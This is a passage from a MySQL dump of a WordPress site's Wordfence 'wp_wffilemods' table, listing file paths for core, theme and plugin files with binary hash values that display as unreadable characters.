  `SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `stoppedOnSignature` varchar(255) NOT NULL DEFAULT '',
  `stoppedOnPosition` int(10) unsigned NOT NULL DEFAULT 0,
  `isSafeFile` varchar(1) NOT NULL DEFAULT '?',
  PRIMARY KEY (`filenameMD5`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wffilemods`
--

LOCK TABLES `wp_wffilemods` WRITE;
/*!40000 ALTER TABLE `wp_wffilemods` DISABLE KEYS */;
INSERT INTO `wp_wffilemods` VALUES ('\0?H�\0�E}�����\"�','wp-includes/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','01����vnG��\r�',']/r~�ʺO���C�c�xB��j/�o��U�I*�','',0,'?'),('\0\'�x;�~�z��ڢ�','wp-admin/wpimages.php',0,'S��`�O\n�����','S��`�O\n�����','�̓�8�����uM��>�@�P\0M��/��k','',0,'?'),('\0)4\nTY��d4G~�','wp-includes/images/w-logo-blue-white-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Ȉk�|�Ѽ���','O�ɗ�o����C��A�/x����<��%4=?','',0,'?'),('\00��#�9���Z4�j$','wp-admin/network/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�d4VڋS~tɱ�ź','�o�ᕑ�\"t�y�S�����M8�!9/�?Y�X�','',0,'?'),('\05g���꫔c�0�\"D','wp-includes/css/media-views-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��M]�1f�D,��>�','�mA �7N�/z}��;��e��r�cs�#sW','',0,'?'),('\0C_\n��jD��@k','wp-admin/network/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�)��&�c���','1�t/g�7O�$�U~�4n7�Z\Z�;u��)�dk��n','',0,'?'),('\0G���M(��YlWz�!','wp-includes/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pZ�����:!�ټ�','3�l�@���o�-�3���S���Տ&�!��','',0,'?'),('\0G�S���3j�k','wp-includes/wp-includes/css/customize-preview.css',0,'1ig`��o���ӏٷ1>','1ig`��o���ӏٷ1>','�>kdU���������=@R���\r����;�','',0,'?'),('\0RȞ6� ��-����','wp-includes/wp-includes/sodium_compat/src/Core/XSalsa20.php',0,'p��Ʈ�u��o7;~z','p��Ʈ�u��o7;~z','����� %l�y�\'�#[���_�{E�]8�%�','',0,'?'),('\0[��xFLpǍ��)+�','wp-includes/wp-includes/images/media/archive.png',0,'9����h�\0��ì�u','9����h�\0��ì�u','\0�Bb�3��\'��\'��)JG ��](G�9Pr2 s','',0,'?'),('\0`Y�ϭrG����','wp-includes/SimplePie/Restriction.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[\"��~\'���$|2*�','�>�3�	vj��\r|\")\"�5SR�\0�{k����{6','',0,'?'),('\0i��bi�6\Z��ɽܮ','wp-includes/wp-includes/sitemaps/class-wp-sitemaps-registry.php',0,'�����G���o�\n�>','�����G���o�\n�>','>��\0�B��[��Z��>�p�ޏ�a0~5k�[�G�','',0,'?'),('\0v�ώ�U��V�','wp-includes/wp-includes/SimplePie/File.php',0,'i�~Hwb�x��xsٷ:�','i�~Hwb�x��xsٷ:�','0���sD���;��P�=�\'��2�	��\0Df��','',0,'?'),('\0Ơ�2!��n[�g','wp-content/themes/sg-window/inc/customize-mobile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�AO7��\Z�MP�dq','!�l��\\TF\n�p%�s���zG���okb��','',0,'?'),('\0���;f��Q�=*Ǖ�','wp-includes/js/wp-emoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�����׶H;�q.�','�������O��)`5g�D?5F�!����','',0,'?'),('\0�ƀ�ճW϶�q3�','wp-content/themes/shootingstar/functions/about/images/active_hover.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fmg�A�����K]8�.','����׶��4�Leo6j+��I�y��Q�P�','',0,'?'),('\0�9�k5&�ٙ 7N','wp-includes/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�kݢA��D�5z�yj','BQ�e!�R�il��s�nq��R41x�x�Q!','',0,'?'),('\0�|9��u�e���@��','wp-admin/includes/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��)�\\�w�s����}\0','�9)�>�[	�\0b|�WC����L���#�+�','',0,'?'),('\0�D�`�8R��ɲ%��','wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}��`i���y��','���Tܯ����19^�ջ�P\'�L�d%�k|�P؞','',0,'?'),('\0�lDd��u^��Y��','wp-admin/user/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�I���U{x1�A','F��u�X\0�og�:~��h��_��5��p�t�$','',0,'?'),('\0�K�z\n�7�����p��','wp-includes/wp-includes/js/json2.min.js',0,'�����x�}\'��-��8','�����x�}\'��-��8','?	��s�s��(q���c!~a�ж�H�\\y','',0,'?'),('\0� $���ә\0֫','wp-includes/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'׊�@~w\0�5','1���lmb����E�W\0�34,F˯֠�Q','',0,'?'),('\rx+�U��ڜ���','wp-includes/css/dist/list-reusable-blocks/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T���6JҨNM!d��$t','E��|���K4�g�,��_��^��,��	Ev�','',0,'?'),('7S�I�fe���(��','wp-includes/wp-includes/blocks/buttons/block.json',0,'T���9���D?_�7E','T���9���D?_�7E','��Y]K܊�QS駤��k;�	ͥ�{/ʅ�j�','',0,'?'),('L\r�����8?�J�F','wp-includes/wp-includes/bookmark.php',0,'��7!ć>pP�:�ޑ\r','��7!ć>pP�:�ޑ\r','6̎2M̥���?��&rA���bĪ�ux^с','',0,'?'),('NDj^:uT�>B�*��','wp-content/plugins/wordfence/css/main.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|8/�_NN���7�','pE(���4,�G�i�:��UML�k5�Y��','',0,'?'),('NQ�\"*hz�r�w|\Z�','wp-admin/images/media-button-other.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q&T^�]BB�g\'��','��B\Z�r�F�В���Pv-^fT�,�_��i','',0,'?'),('Vl�K����P%A��F','wp-includes/wp-includes/comment.php',0,'�A���]�ř3F8rȃ','�A���]�ř3F8rȃ','\'B�6E�:��bw=�#u�\0��>	&���M�','',0,'?'),('X�ɘy_�7�XN/','wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\Z��.*:î�+�1','��\Z���ޔ�eg�)��QRC��A�m����','',0,'?'),(']��j��R���X','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��//R�����j���.','��3\'�X\r�o�`/��D����/�3\Z','',0,'?'),('��$��U�d9�nW9','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js',0,'?с;��9�A����t�\n','?с;��9�A����t�\n','�k���O�{d��PS���\0M�\"B]�\"�E��','',0,'?'),('�m!U߄���U','wp-content/plugins/wp-cerber/assets/flags/bz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�����ڜ�','�0^k R�e�����q��C���G���Q\"��','',0,'?'),('�T�h���zP��r�','wp-admin/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iz��k”���$]�','��\'MLJ)�ֺma� �fq�JK�-����Ȧ�','',0,'?'),('�ϋД\'Ot�ʗM;','wp-includes/js/dist/deprecated.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U���@�\Z���>','y���e@���r6�1��r\0.t/�7\\��Wy','',0,'?'),('�Qk�ԃ�Q3��%��','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/embedded.png',0,'����p�N��y~�n\"','����p�N��y~�n\"','�{��u�x�\'����J�º@i\"H;�]6h','',0,'?'),('�X|_��wc�:�j��','wp-includes/blocks/search/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�虚-�.�\Z��2	�','޻O�ͯ�G�2�\n�ɣ~�V��\Z6��|x','',0,'?'),('��E?tB9b��vF`1','wp-content/plugins/wordfence/modules/login-security/img/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('�aB R����X�','wp-includes/wp-includes/js/wp-auth-check.js',0,'j{�,��ݍ�][c','j{�,��ݍ�][c','�R)C�`p��	ъ ���;(�Ltcn�zƈ��','',0,'?'),(';zp�ʃ��E�#�','wp-includes/wp-includes/customize/class-wp-customize-background-image-control.php',0,'�{f�&��E\\$�sX�','�{f�&��E\\$�sX�','R�v3����~������|.O�L�t�N`Ѯ��','',0,'?'),('t]�ٟu��u��j�','wp-admin/images/menu-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q���L�,_�;1/�E�','G�iH|��)��E;��\"_�;ԣ4Իw�ly�','',0,'?'),('��~�w`�5;F㮮','wp-includes/js/jquery/ui/effect-size.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t(������D','�[�9E�3%��4�F�9��:�uØ�~j9�','',0,'?'),('�=��q�\rljA+','wp-admin/user/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<D\0�\n#���E����','X�x�no�{\0���\\��䞿��e[��jZN','',0,'?'),('\'�5�ur߲���m','wp-content/plugins/wp-cerber/cerber-whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m���D�pM����Q�','t<e��F/�+�A�8�_�D\Z�����[��jg','',0,'?'),('<)8T*.�SuS�ĺ�','wp-includes/SimplePie/Cache/MySQL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�) ��fz���C�0�','	��W��A��2Lh�`���i�%iv�2���޴','',0,'?'),('F��/*+��k<Iy�','wp-includes/wp-includes/ID3/module.audio.ac3.php',0,'�>Y����\Zk0�aM','�>Y����\Zk0�aM','�b��^#��¨(t�^�rߘz���9�F���','',0,'?'),('HC���!���\"(�','wp-includes/js/tinymce/plugins/compat3x/css/dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wyB���o�|��','��o��Jj$��sc��R��Q��c��伍F��','',0,'?'),('J�\rӷG>�����','wp-includes/class-walker-page-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tB�B2�[eJ��5�a','Y�Ds4��I<����A�t�ȃ���\Z��G���.','',0,'?'),('u��s��y6\'v,��=','wp-includes/js/tinymce/plugins/wordpress/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f\\�DŽH�$�M(�l�','@��3�\nQz�p��\n�j;Q��w��k���13�<','',0,'?'),('�\"�qUy���9�%Q�','wp-includes/class-wp-matchesmapregex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q���d̚w$<龦q','9�l�~�>S5]8�ٺ�ɞ���FiJ�����Z','',0,'?'),('�����ࣺE\0�堌','wp-content/plugins/wordfence/css/wf-colorbox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PX)p!��N8�j��','o�t0�\r�P2��N�����i���K��u���','',0,'?'),('����mx�u�)�y�\"','wp-includes/wp-includes/js/dist/vendor/moment.js',0,'�\nt�|�\'3�� 0���','�\nt�|�\'3�� 0���','\rL�G��6���q	��\\�-���P�I���','',0,'?'),('��*�����l	�	�8�','wp-includes/wp-includes/js/codemirror/fakejshint.js',0,'5�v�,ROlx]J\')K','5�v�,ROlx]J\')K','��-�6�$$�;���}ptO�4]2��ТR�5֡','',0,'?'),('� ����K i�D��t','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Zz�#H��','n]��x�������\Z_Ѫk�B�-a�&�̃','',0,'?'),('����7�&��Ȁ','wp-includes/js/tinymce/skins/lightgray/content.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\PI�ɥ��<\\��',')�Y@�u&�Kg��\0?���\\F\'�X0�Lj�','',0,'?'),('��*(��*�+�Wj�cp','wp-content/plugins/wordfence/crypto/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3Կ:�V�	��U\'','���|<���P*tg�3�dYs��/������','',0,'?'),('�85\\R��qo�-���=','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h����$x /�����','�<b��ob����nA���E���7_��GK','',0,'?'),('��0r�H\"�YK]T�','wp-admin/css/site-icon-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����L�DR��*�','Yin>j�#�K�N%8TP����O_���,','',0,'?'),('=$l�.��~���A:','wp-admin/images/freedoms.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e\r�$�]�O{��','�� \n��9�)Kb}�S�p���McP�AYX','',0,'?'),('(���љ����\0H<_','wp-admin/includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','س�F\0��~���Y�','��\\^��\Z���߹�b*j��R	��p<#~%7','',0,'?'),(':����{��!W�U�','wp-includes/wp-includes/sodium_compat/src/Crypto32.php',0,'I\r}j�NJQX]m��','I\r}j�NJQX]m��','ɱ��䱃Fn����2c.n�M��ڣ� A���','',0,'?'),('<.��4�v��c�\"`�t','wp-includes/class-wp-simplepie-sanitize-kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0s�7�^�GU���_','�EJ�\'{6�i���|�~�c��/�l','',0,'?'),('i�PÙ��ld\0��','wp-includes/css/jquery-ui-dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�G�-_f���kqT�','v�4�8p�nf��Z�H\"ռ\\�;j�R&N�','',0,'?'),('k�4c����5<\"','wp-includes/js/dist/autop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��^3�u��<�ZR��','G��r����t�E�Y�b�KC�a<r(��(�;�','',0,'?'),('})Z��#4�c��4�','wp-content/plugins/wp-cerber/assets/flags/au.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�N��n�[���','��|�S�Qw\0��j�G��N��*M����v%','',0,'?'),('��7.�\'���oN�','wp-includes/wp-includes/js/mediaelement/mediaelementplayer.css',0,'�1�ĪL��5��!\n�','�1�ĪL��5��!\n�','o��^:v\\���m���o����cTW[���k','',0,'?'),('��N����Y�H»	��','wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js',0,'�#�R?�\"�`�$�`','�#�R?�\"�`�$�`','!	�n�‚�śU7B��5gr�	1�*;R�','',0,'?'),('�0��Y%�@�X�ʉ�','wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js',0,'�be& W����Ř�','�be& W����Ř�','Iu{W�m�bk_�����.�cx\rh+K�','',0,'?'),('��\n?&]S�8eDO','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php',0,'^�\"3R0������','^�\"3R0������','��z�m1��xJ �g�Ь�xs�sIѻ˸�2','',0,'?'),('�,�/�z����*�f','wp-includes/wp-includes/ID3/module.audio-video.flv.php',0,'r�����w�I�@��','r�����w�I�@��',';hg�D�)\r�:n���e8c������\"�.�','',0,'?'),('�D����5��','wp-includes/wp-includes/images/smilies/icon_idea.gif',0,'���<]�W3tށ�','���<]�W3tށ�','�{�2^4S����Tl���I�J�Q��\"','',0,'?'),('�{��^�3����r','wp-includes/wp-includes/class-wp-widget.php',0,'F�� �B��Ի��','F�� �B��Ի��','���/�����0�=�|{h��n�R�','',0,'?'),('!���@|�4��n���','wp-includes/class-http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�5���U�c��5�{Q','��v,�óiēm`�<�߲~\n\"���\r','',0,'?'),('\'ڞ\0;��?�+VҪ�','wp-admin/network/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����=��#L�H���','q�/*߲3��x�S���~�.\']w��k�,W','',0,'?'),('1a�N��b��D1_i�','wp-includes/wp-includes/capabilities.php',0,'�Iu,�I��WN�7','�Iu,�I��WN�7','<�P�ёxC�eo�I)O_d�/�wg�w�1�','',0,'?'),(';pR9��+�qpծ','wp-admin/includes/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':s��B�\Z�?���l','6l.v>��\\��c�4շ=T��~l�F��n�','',0,'?'),('dV��p�@��La','wp-includes/wp-includes/js/jquery/ui/effect-fold.min.js',0,'��&��L���R���<','��&��L���R���<','��C�]*\'�W�\"�о����V��Jq���','',0,'?'),('x��m���\0�~���','wp-includes/customize/class-wp-customize-nav-menus-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�K͞�u	Q�� �p�','�/\'V\ZVtb\"���d����s\"e��@���I<','',0,'?'),('�I����Z�L��p','wp-includes/wp-includes/sodium_compat/src/Core32/Int64.php',0,'%m�S�,���\\�','%m�S�,���\\�','U���!�6��/�U�cq���n���@�+�','',0,'?'),('��k[҄.? F�R�p@','wp-content/plugins/wp-cerber/assets/flags/vc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C)���y$���%�E','���N�h��А!�o�:s1�o�~%�`�','',0,'?'),('���\n�#�T��?׻��','wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=3n.�ZK7�Rb~<��','L��ؖ�kn��HN�\n��$�����ʨ�#���','',0,'?'),('��� )�\n47 ,3','wp-includes/wp-includes/feed-atom.php',0,'{\r�g�\'SkI�fe�p�','{\r�g�\'SkI�fe�p�','!�I��m\nY��f+̕�P\0����13�\\=��','',0,'?'),('�Ú2��d�=','wp-includes/rest-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�ם�Z�1I$\'O�','�|\r�j���͞�;#�\nZ�0�|�Iݩ���','',0,'?'),('�P\0\'�0l���v�#J<','wp-includes/js/jquery/ui/effect-fold.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&��L���R���<','��C�]*\'�W�\"�о����V��Jq���','',0,'?'),('����\0�4������','wp-includes/wp-includes/SimplePie/Cache/Base.php',0,'b�ĞA�ʖ�䦴j��','b�ĞA�ʖ�䦴j��','��oO��w��~9K����4oY�[K�e��\\RG','',0,'?'),('Ȅ���xy����','wp-includes/js/tinymce/skins/wordpress/images/embedded.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����p�N��y~�n\"','�{��u�x�\'����J�º@i\"H;�]6h','',0,'?'),('ϴ 3P`#8^��Z','wp-admin/css/colors/coffee/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X����3p����ǵ�P','A�j�Ⱦf�F���F�]��0=�޹�|���','',0,'?'),('�G�#�;\"L�%���','wp-includes/blocks/categories/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A؂Gd�r�zQ���','\"|��\'��Ru�G ��� W�T{�I�9C�R\\R�','',0,'?'),('���S��n����','wp-content/plugins/wordfence/css/wf-roboto-font.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]���O�uݵ�','�+�hJ~�ʆ��*��a*���Gb67�\r�:�','',0,'?'),('�M�g�-YiN���','wp-includes/wp-includes/js/wp-api.min.js',0,'�(�ϩx.�@���� ','�(�ϩx.�@���� ','�eU\"O�8�W���|����v�����\'����~)','',0,'?'),('\"��N߬jj)��\0��N','wp-admin/images/menu-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jG����{�>�^;$��','�2]y��#h���2�9�> ^s�\rH�	\n��g��','',0,'?'),('q���_\"�1�F','wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C_�n�4]hc��3�?','�wD�Z��s�J������dӚ�K���N҇','',0,'?'),('tZQ��Yz0����跫','wp-admin/images/wordpress-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ư�y��o�8��8S�`�','bx�L�PͰ��=^���a�m���1i��','',0,'?'),('v�ǵ�>7�Lg��+��','wp-includes/wp-includes/class-http.php',0,'f�5���U�c��5�{Q','f�5���U�c��5�{Q','��v,�óiēm`�<�߲~\n\"���\r','',0,'?'),('���k�5S�H���Ы','wp-includes/SimplePie/Author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��hK\0�k�1���N\"','N����\\��pt3����+,l�\'�cOQ+�Z�','',0,'?'),('���e�bW�A0�d','wp-admin/images/comment-grey-bubble.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�*\'����t���F','7	��y�񮌬��U{����ԟ��`��]m��','',0,'?'),('��[���4��?�s','wp-includes/css/dist/block-library/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;�rQ��E4��','���nu�.��C�{�R���A�\r�9A/�f��','',0,'?'),('�Ia�\n؎����a','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>\Z��\Z+�,','*y$�MQ[q�:h�\"�)�XTC\0�\\k','',0,'?'),('��Ͱ����z\'�!','wp-content/themes/sg-window/page-templates/full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�K���\"�����','������0�c�:&ikA�`��3��^ep,�s','',0,'?'),('�7@%��\r\ZI��T','wp-includes/wp-includes/class-wp-oembed.php',0,'��)�Q�\\�2%����','��)�Q�\\�2%����','���`fO2��c���3/(�A̝T�tA�p','',0,'?'),('m�qPoD0�*��L','wp-content/plugins/wordfence/lib/wfRESTAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\8���H� �mi�+','+��+�Ɵ���0��͂b�=���[㜁��','',0,'?'),(' �,eO���z��Ñ�','wp-includes/customize/class-wp-customize-site-icon-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$0V�����<','(V+���g��]�!�i�}w��š)��5m>-��','',0,'?'),('\"�F{�L��M��#�L','wp-includes/wp-includes/images/smilies/icon_mrgreen.gif',0,'�$_��u�X|I%~$','�$_��u�X|I%~$','!B���I1�mV�-���|ј�X5D�8���h�','',0,'?'),(',5�Xp�BFdc�j+�','wp-includes/js/dist/vendor/lodash.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:)DnBC���9��','�-�1,�O�\"y�I띎�N�WI�#nKk\0:�','',0,'?'),('0@�,���i�n��B�','wp-includes/wp-includes/css/wp-pointer-rtl.css',0,'b;���f�J-�','b;���f�J-�',' \0��Drá�)�\Z�k��y�Q��h�q�.\nCK','',0,'?'),('8B�^�_�H�yn�}','wp-includes/wp-includes/update.php',0,'*�瑥���\n��bk\0�q','*�瑥���\n��bk\0�q','��\n	�U����y���A��80CĆ���6$3','',0,'?'),('Q� ��(;ؠ|~R8�b','wp-admin/includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0;�wBwH��3Vo!��','�0��ͩf#���?����:�\0\\O����e�','',0,'?'),('T�]\\g���4źuP�;','wp-admin/css/admin-menu-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�m	��ἦ���e','���$��_X��oZ\'�&�\n5��5ԧv','',0,'?'),('b���p�A�+�-+ʉ','wp-admin/js/widgets/text-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������\n|=�}','�ӄ=�gHt]{كL�]�_^�.ˌ��i','',0,'?'),('�����n�P���Q`','wp-content/themes/shootingstar/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!֚�VO�c�ӵ�X','�1V!�1ܓ`,�!��U����1��FF','',0,'?'),('�b���͕��+f3�c','wp-includes/blocks/latest-posts/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5P�m��)-\\\r�M�','/B�Oq<Rv\0ѓv�eys��u�\0)b�\rk{�6O','',0,'?'),('���%bQ�bM<�x','wp-includes/js/imgareaselect/border-anim-h.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��,�ntZ^6�{Lp�4','qs�c��h���m-�%�x�\ZB��x�\'��E:','',0,'?'),('�-6�Yw@�i��=','wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oh�����O<FҬ�','P�J�H���t�Ns��nd*F�\'WW�aq��]','',0,'?'),('���0,X���','wp-includes/css/dist/edit-post/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����vQD��WO��','���dN�m.��E;\'�\0��O�3�RPB','',0,'?'),('�Ս�G�h����_^','wp-includes/wp-includes/js/jquery/ui/effect-size.js',0,'a;l�@��r%�ݢZ','a;l�@��r%�ݢZ','���cQ>�WYe\Zw\"���`�M�rј^','',0,'?'),('��i)33ܥ��s�*','wp-admin/includes/class-wp-ms-users-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$Bɀ#ɯ�@b','���Om��Ӕ.x�-�Y�(�VOc�pԮY��','',0,'?'),('\rZ��� ��p5of','wp-includes/wp-includes/js/jquery/ui/effect-drop.js',0,'���閴�u)�B���1�','���閴�u)�B���1�','��v��h��d���L�V�y􅊖�^n\"�ّ\0]p�','',0,'?'),('\rP��)�4_\"��\'1','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�܌��ͣ~E||W�r','J�4��5⯷�X���I[�)�*�3=TU�g�K','',0,'?'),('�w`�Dd��V#��t','wp-content/plugins/wordfence/css/fullLog.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�.i�`��΁�U�v','?�>��?h�ξ[�²�P�u�{�pu�a����a','',0,'?'),('k�\0�`}����4v','wp-content/plugins/wp-cerber/assets/flags/re.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('o���	l�Ѵ�cd','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n���@Lj�wD�','\r�8�d�������8sڇ���6��F�Ȍ�','',0,'?'),('�x��|s����K�a�','wp-content/plugins/wordfence/views/common/page-help.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�o��\0X#�83�~','��$�>���\n\ZW��)O��\0����(\n�ݮ�\08','',0,'?'),('��f��� �<@���','wp-includes/wp-includes/css/dist/edit-post/style-rtl.css',0,'�����vQD��WO��','�����vQD��WO��','���dN�m.��E;\'�\0��O�3�RPB','',0,'?'),('���#����	>�7','wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��m���LWyݓH','�\rfl�դ/�;l\\��\\.6��r�#P�[��','',0,'?'),('ņL�G��P(�Ή�ȯ','wp-admin/js/widgets/media-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t�W@gU�_4����','�\r��I&���ċ�9wƙ攢�J�_G�','',0,'?'),('�&�	A�H��)�I&��','wp-includes/js/dist/vendor/moment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nt�|�\'3�� 0���','\rL�G��6���q	��\\�-���P�I���','',0,'?'),('�cY�F���}�j`��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3����b(浏К','n;�<��	Ǖ�-W�t��]��<�s���u�','',0,'?'),('&��2������','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/composer-php52.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ylh��w�%Re���','���\njq�W��	�v_�#�� f��~��R�>','',0,'?'),('#�7��r�Y�\0��i','wp-content/plugins/wordfence/views/common/status-tooltip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3ܧ_����Z�#�t','�V5�Rj:Z��.���\n5� 